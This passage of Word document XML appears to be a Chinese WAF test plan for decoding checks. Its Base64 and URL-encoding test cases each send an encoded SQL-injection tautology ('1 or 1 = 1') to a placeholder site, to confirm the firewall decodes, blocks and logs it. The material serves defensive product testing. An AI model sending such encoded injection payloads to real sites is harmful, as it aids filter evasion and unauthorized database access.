      <w:tr w14:paraId="4B57EC14">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="58B15820">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="268EB239">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1FF803A7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="07089E06">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70A30F17">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A86C710">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F8F8541">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08B0ECDF">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067BDA44">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc81916109"/>
      <w:bookmarkStart w:id="84" w:name="_Toc21077806"/>
      <w:bookmarkStart w:id="85" w:name="_Toc1838615500"/>
      <w:r>
        <w:t>常用编码解码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="58711F78">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc21077807"/>
      <w:bookmarkStart w:id="87" w:name="_Toc81916110"/>
      <w:bookmarkStart w:id="88" w:name="_Toc1468511817"/>
      <w:r>
        <w:t>BASE64解码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>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29773A4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="06D1245A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="206C376F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:t>ASE64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7CD985C2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="373C3E02">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1D23AE11">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造经b</w:t>
            </w:r>
            <w:r>
              <w:t>ase 64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码后的攻击请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警；攻击的p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>被编码后，会加大W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的防护压力。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25786E22">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FED5D89">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="102A2691">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:after="163" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>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添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C163B54">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEED743">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行b</w:t>
            </w:r>
            <w:r>
              <w:t>ase 64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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和被编码的字符串，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/?value=MSUyMG9yJTIwMSUyMD0lMjAx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C505B2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="253D565B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1825DA7B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7F3B6923">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功识别BASE</w:t>
            </w:r>
            <w:r>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码后的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164393" name="Picture 385164393"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="base64_event_62bc5c52ee9b45d98b127f871bd4a556_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>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94" name="Picture 385164394"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="base64_event_62bc5c52ee9b45d98b127f871bd4a556_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="102C127E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D26B774">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1158A12E">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1DF969D0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="05CE28C5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50FEBB7F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="576BDE3D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6039A19A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="045D1460">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E3691E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc81916111"/>
      <w:bookmarkStart w:id="90" w:name="_Toc21077808"/>
      <w:bookmarkStart w:id="91" w:name="_Toc248553348"/>
      <w:r>
        <w:t>URL解码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="9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381C1E4C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C4446E5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="32606C01">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r>
              <w:t>RL Encoding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="260EBADC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="29C32031">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3DB6BA1D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造U</w:t>
            </w:r>
            <w:r>
              <w:t>RL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码后的攻击请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5966E201">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E2358F9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4D191422">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实server；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562647B9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159A6937">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行</w:t>
            </w:r>
            <w:r>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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和被编码的字符串，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/?value=1%2520or%25201%2520%3D%25201</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC310C3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5602C72C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5AF9200C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="224F447A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
